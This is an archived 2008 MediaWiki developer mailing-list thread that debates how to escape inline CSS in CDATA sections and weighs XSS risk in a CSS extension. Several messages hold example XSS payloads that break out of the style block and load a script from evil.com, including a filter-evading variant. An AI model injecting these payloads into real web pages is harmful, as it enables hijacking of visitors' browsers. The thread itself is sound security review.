On Wed, Jul 30, 2008 at 11:36 PM, nad@svn.wikimedia.org wrote:
Log Message:
I meant to say should *not* use htmlspecialchars, it makes invalid CSS syntax - bug reported on MW talk page ...
$css = htmlspecialchars(trim(Sanitizer::checkCss($css)));
$css = trim(Sanitizer::checkCss($css)); $parser->mOutput->addHeadItem( <<<EOT
<style type="text/css"> /*<![CDATA[*/
I'm pretty sure this results in a rather straightforward XSS exploit. What if $css is something like:
]]></style><script type="text/javascript" src="http://evil.com/take_over_browser.js"></script><style type="text/css"><![CDATA[
You aren't escaping "]]>" anywhere.
The more correct solution, it seems to me, is to dispose of the CDATA section altogether. It's entirely unnecessary if the code is automatically generated and you can stick it through htmlspecialchars, especially if there's probably almost nothing to escape and the CDATA delimiters look uglier than the occasional rare < or whatnot. I've done this in r38307.
Simetrical wrote:
On Wed, Jul 30, 2008 at 11:36 PM, nad@svn.wikimedia.org wrote:
Log Message:
I meant to say should *not* use htmlspecialchars, it makes invalid CSS syntax - bug reported on MW talk page ...
$css = htmlspecialchars(trim(Sanitizer::checkCss($css)));
$css = trim(Sanitizer::checkCss($css)); $parser->mOutput->addHeadItem( <<<EOT
<style type="text/css"> /*<![CDATA[*/
I'm pretty sure this results in a rather straightforward XSS exploit. What if $css is something like:
]]></style><script type="text/javascript" src="http://evil.com/take_over_browser.js"></script><style type="text/css"><![CDATA[
You aren't escaping "]]>" anywhere.
The more correct solution, it seems to me, is to dispose of the CDATA section altogether. It's entirely unnecessary if the code is automatically generated and you can stick it through htmlspecialchars, especially if there's probably almost nothing to escape and the CDATA delimiters look uglier than the occasional rare < or whatnot. I've done this in r38307.
Sanitizer::checkCss should ensure that $css is valid CSS, and returns false (i.e. "it was just too evil", according to its docs) for your suggested string. The code should check for this case (i.e. for returning false), but it doesn't seem like an XSS exploit - it will probably just add an empty CSS block.
About the CDATA section, it seems that the XHTML standard recommends using it. It is also used in core, e.g. in the script of variables in each page.
On Thu, Jul 31, 2008 at 12:57 PM, Rotem Liss rotemliss@gmail.com wrote:
Sanitizer::checkCss should ensure that $css is valid CSS, and returns false (i.e. "it was just too evil", according to its docs) for your suggested string. The code should check for this case (i.e. for returning false), but it doesn't seem like an XSS exploit - it will probably just add an empty CSS block.
Well, that's because I included an undisguised URL. It lets this through untouched, which should be equivalent, IIRC (at least if the current connection is over HTTP):
]]></style><script type="text/javascript" src="//evil.com/take_over_browser.js"></script><style type="text/css"><![CDATA[
Also this, which should always be equivalent:
]]></style><script type="text/javascript">document.write( '<script type="text/javascript" src="htt' ); document.write( 'p://evil.com/take_over_browser.js"></script>' );</script><style type="text/css"><![CDATA[
checkCss assumes that its output will be executed as CSS, and is quite safe if that's the case. If the output can be executed as HTML, it's not safe at all.
About the CDATA section, it seems that the XHTML standard recommends using it.
It doesn't recommend it, it just suggests it as one possibility to ensure that markup is valid:
http://www.w3.org/TR/xhtml1/#h-4.8
This is in contrast to HTML, where (at least in practice) browsers would special-case the contents of script and style tags and might be kind if there were unescaped content there. Using htmlspecialchars is just as valid a way of escaping here.
It is also used in core, e.g. in the script of variables in each page.
That's not an XSS exploit by itself, because that's added either by the software or by sysops, both of whom are allowed to inject arbitrary JS. Of course, there's no XSS vulnerability if unescaped *scripts* are put in CDATA tags anyway. You can inject arbitrary scripts without having to break outside the CDATA in that case, obviously.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Simetrical wrote:
About the CDATA section, it seems that the XHTML standard recommends using it.
It doesn't recommend it, it just suggests it as one possibility to ensure that markup is valid:
http://www.w3.org/TR/xhtml1/#h-4.8
This is in contrast to HTML, where (at least in practice) browsers would special-case the contents of script and style tags and might be kind if there were unescaped content there. Using htmlspecialchars is just as valid a way of escaping here.
HTML 4 defines the contents of those elements as CDATA in the DTD, just like <br> and <img> are defined as having no content so there's no ambiguity when they're being interpreted by an HTML parser.
XHTML doesn't provide for that sort of declaration, since XML requires you to be able to parse a document without having a DTD ahead of time.
For compatibility of documents between both HTML and XHTML parsers, XHTML 1.0 recommends using linked resources if possible -- so there's no worry about how to escape contents -- or else using explicit <![CDATA[...]]> sections in your <script> and <style> elements.
- -- brion vibber (brion @ wikimedia.org)
On Thu, Jul 31, 2008 at 3:48 PM, Brion Vibber brion@wikimedia.org wrote:
HTML 4 defines the contents of those elements as CDATA in the DTD, just like <br> and <img> are defined as having no content so there's no ambiguity when they're being interpreted by an HTML parser.
XHTML doesn't provide for that sort of declaration, since XML requires you to be able to parse a document without having a DTD ahead of time.
For compatibility of documents between both HTML and XHTML parsers, XHTML 1.0 recommends using linked resources if possible -- so there's no worry about how to escape contents -- or else using explicit
<![CDATA[...]]> sections in your <script> and <style> elements.
So in fact, a compliant HTML parser *would* parse the contents of <script> or <style> incorrectly, if it contained entities that were expected to be decoded? In that case my fix is wrong, and we should write up a Sanitizer::escapeCdata() and use that here (and elsewhere).
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Simetrical wrote:
On Thu, Jul 31, 2008 at 3:48 PM, Brion Vibber brion@wikimedia.org wrote:
HTML 4 defines the contents of those elements as CDATA in the DTD, just like <br> and <img> are defined as having no content so there's no ambiguity when they're being interpreted by an HTML parser.
XHTML doesn't provide for that sort of declaration, since XML requires you to be able to parse a document without having a DTD ahead of time.
For compatibility of documents between both HTML and XHTML parsers, XHTML 1.0 recommends using linked resources if possible -- so there's no worry about how to escape contents -- or else using explicit
<![CDATA[...]]> sections in your <script> and <style> elements.
So in fact, a compliant HTML parser *would* parse the contents of
<script> or <style> incorrectly, if it contained entities that were expected to be decoded?
Right... I just did a quick test confirm. This file:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <title>Test</title> </head> <body> <script> alert("&"); </script> </body> </html>
will display "&" when served as text/html and "&" when served as application/xhtml+xml.
In that case my fix is wrong, and we should write up a Sanitizer::escapeCdata() and use that here (and elsewhere).
Icky... but perhaps no good way around it I guess. :)
The tricky bit is that for HTML mode you want to wrap the "<![CDATA[" and "]]>" bits in comments (/* blah */) so they don't interfere with the JS or CSS code.
Does that necessarily generally work? Bah, this shouldn't be so annoyingly hard...
- -- brion
On Thu, Jul 31, 2008 at 6:25 PM, Brion Vibber brion@wikimedia.org wrote:
Icky... but perhaps no good way around it I guess. :)
The tricky bit is that for HTML mode you want to wrap the "<![CDATA[" and "]]>" bits in comments (/* blah */) so they don't interfere with the JS or CSS code.
Does that necessarily generally work? Bah, this shouldn't be so annoyingly hard...
Yeah, I see the problem. There are two reasonable solutions I see. One:
public static function escapeCdata( $data ) { if( strpos( ']]>', $data ) == false ) { return $data; } return ''; }
Two:
public static function escapeCssForCdata( $css ) { return str_replace( ']]>', ']]\00003E', $css ); }
The first one is potentially annoying, but in both CSS and JavaScript it should be easy to work around the limitation. The second one is maybe nicer for CSS, *except* that I'm not totally sure that it would always work.
I *think* the only place that literal ']]>' would be valid in CSS is comments and string literals. Comments don't matter, and I *hope* that all CSS clients would treat \00003E the same as > in a literal string. Or in a URL, which isn't really a literal string in CSS, is it? Or similar things, I guess . . .
The first way seems to be the most straightforward way to handle it for now. It's unlikely to come up with any reasonable frequency, and when it does it can be worked around by authors. If the second way actually works consistently, it would be nicer for CSS. I doubt anything comparable would work for JavaScript, since who knows where ']]>' could occur? if( x[y[z]]>7 ) {...}
On Thu, Jul 31, 2008 at 7:51 PM, Simetrical Simetrical+wikilist@gmail.com wrote:
if( strpos( ']]>', $data ) == false ) {
That's got to be ===, of course. We all know how much I love PHP weak typing, so I won't say any more on that . . .
Simetrical wrote:
I *think* the only place that literal ']]>' would be valid in CSS is comments and string literals. Comments don't matter,
Specially because checkCss removes them, so no need to worry about them :)
The first way seems to be the most straightforward way to handle it for now. It's unlikely to come up with any reasonable frequency, and when it does it can be worked around by authors. If the second way actually works consistently, it would be nicer for CSS. I doubt anything comparable would work for JavaScript, since who knows where ']]>' could occur? if( x[y[z]]>7 ) {...}
You would replace ">" by " >" here as it's an operator. But if it's in a string you want to replace with "+"> or '+'> Perhaps forbidding is the easiest wayy, and make the developers struggle around it, as they did for years with </script>
On Fri, Aug 1, 2008 at 7:36 PM, Platonides Platonides@gmail.com wrote:
You would replace ">" by " >" here as it's an operator. But if it's in a string you want to replace with "+"> or '+'> Perhaps forbidding is the easiest wayy, and make the developers struggle around it, as they did for years with </script>
Yes, that's my thought. It's easy to work around manually on a case-by-case basis, not so easy to work around in the software.
I'm not sure about the exploit side of things, but what I do know is that if you add the htmlspecialchars then it breaks the functionality because it converts quotes etc in the inline CSS into entities, so it really needs to be removed.
Rotem Liss wrote:
Simetrical wrote:
On Wed, Jul 30, 2008 at 11:36 PM, nad@svn.wikimedia.org wrote:
Log Message:
I meant to say should *not* use htmlspecialchars, it makes invalid CSS syntax - bug reported on MW talk page ...
$css = htmlspecialchars(trim(Sanitizer::checkCss($css)));
$css = trim(Sanitizer::checkCss($css)); $parser->mOutput->addHeadItem( <<<EOT
<style type="text/css"> /*<![CDATA[*/
I'm pretty sure this results in a rather straightforward XSS exploit. What if $css is something like:
]]></style><script type="text/javascript" src="http://evil.com/take_over_browser.js"></script><style type="text/css"><![CDATA[
You aren't escaping "]]>" anywhere.
The more correct solution, it seems to me, is to dispose of the CDATA section altogether. It's entirely unnecessary if the code is automatically generated and you can stick it through htmlspecialchars, especially if there's probably almost nothing to escape and the CDATA delimiters look uglier than the occasional rare < or whatnot. I've done this in r38307.
Sanitizer::checkCss should ensure that $css is valid CSS, and returns false (i.e. "it was just too evil", according to its docs) for your suggested string. The code should check for this case (i.e. for returning false), but it doesn't seem like an XSS exploit - it will probably just add an empty CSS block.
About the CDATA section, it seems that the XHTML standard recommends using it. It is also used in core, e.g. in the script of variables in each page.
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
On Thu, Jul 31, 2008 at 4:58 PM, Aran aran@organicdesign.co.nz wrote:
I'm not sure about the exploit side of things, but what I do know is that if you add the htmlspecialchars then it breaks the functionality because it converts quotes etc in the inline CSS into entities, so it really needs to be removed.
Even if the CDATA declaration isn't there?
The current revision doesn't allow you have quotes in the inline css for example the quotes in the following inline css will be converted to entities:
{{#css: .foo { font-family: "Times New Roman"; } }}
Simetrical wrote:
On Thu, Jul 31, 2008 at 4:58 PM, Aran aran@organicdesign.co.nz wrote:
I'm not sure about the exploit side of things, but what I do know is that if you add the htmlspecialchars then it breaks the functionality because it converts quotes etc in the inline CSS into entities, so it really needs to be removed.
Even if the CDATA declaration isn't there?
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
On Thu, Jul 31, 2008 at 5:39 PM, Aran aran@organicdesign.co.nz wrote:
The current revision doesn't allow you have quotes in the inline css for example the quotes in the following inline css will be converted to entities:
{{#css: .foo { font-family: "Times New Roman"; } }}
Yeah, you're right, this is broken. We need a CDATA escaper. It should be trivial to write, though.
We're escaping for content, not escaping for attributes (attribute escaping should be handled by different code). So does anyone remember the parameters of htmlspecialchars? http://ca.php.net/htmlspecialchars
string **htmlspecialchars** ( string $string [, int $quote_style [, string $charset [, bool $double_encode ]]] ) ($charset since 4.1.0; $double_encode since 5.2.3)
You know that you can use: $text = htmlspecialchars( $text, ENT_NOQUOTES );
And the quotes won't be encoded.
Though personally... When I make a sanitizer I go for what it's meant to do. Thing like my cleanHtml are meant to make things safe, not escaping of things. htmlspecialchars is meant to take text, and escape it so that when it's outputted into html it looks the same and isn't mangled by things that the renderer thinks are entities. So on that, my sanitizers only convert < and > into < and > they don't do any other encoding, and they don't double encode the entities for <>. Cause the point is to make the syntax so that it won't be considered evil html. And only <> needs to be escaped for that purpose.
~Daniel Friesen(Dantman, Nadir-Seen-Fire) of: -The Nadir-Point Group (http://nadir-point.com) --It's Wiki-Tools subgroup (http://wiki-tools.com) --The ElectronicMe project (http://electronic-me.org) --Games-G.P.S. (http://ggps.org) -And Wikia ACG on Wikia.com (http://wikia.com/wiki/Wikia_ACG) --Animepedia (http://anime.wikia.com) --Narutopedia (http://naruto.wikia.com)
Simetrical wrote:
On Thu, Jul 31, 2008 at 5:39 PM, Aran aran@organicdesign.co.nz wrote:
The current revision doesn't allow you have quotes in the inline css for example the quotes in the following inline css will be converted to entities:
{{#css: .foo { font-family: "Times New Roman"; } }}
Yeah, you're right, this is broken. We need a CDATA escaper. It should be trivial to write, though.
On Thu, Jul 31, 2008 at 11:10 PM, Daniel Friesen dan_the_man@telus.net wrote:
We're escaping for content, not escaping for attributes (attribute escaping should be handled by different code). So does anyone remember the parameters of htmlspecialchars? http://ca.php.net/htmlspecialchars
string **htmlspecialchars** ( string $string [, int $quote_style [, string $charset [, bool $double_encode ]]] ) ($charset since 4.1.0; $double_encode since 5.2.3)
You know that you can use: $text = htmlspecialchars( $text, ENT_NOQUOTES );
And the quotes won't be encoded.
Yes, but something like
html > body { color: red; }
will still break. You miss the point, I think. *Nothing* should be encoded inside <script> or <style>, if you want to remain compatible with HTML.
Though personally... When I make a sanitizer I go for what it's meant to do. Thing like my cleanHtml are meant to make things safe, not escaping of things.
They're meant to make things not just safe but valid. This requires escaping everything that has a special meaning.
So on that, my sanitizers only convert < and > into < and > they don't do any other encoding, and they don't double encode the entities for <>. Cause the point is to make the syntax so that it won't be considered evil html. And only <> needs to be escaped for that purpose.
Quotes also need to be escaped if there's any possibility you'd be in an attribute. And & must always be escaped for normal HTML output if you want to ensure validity, which we do.
wikitech-l@lists.wikimedia.org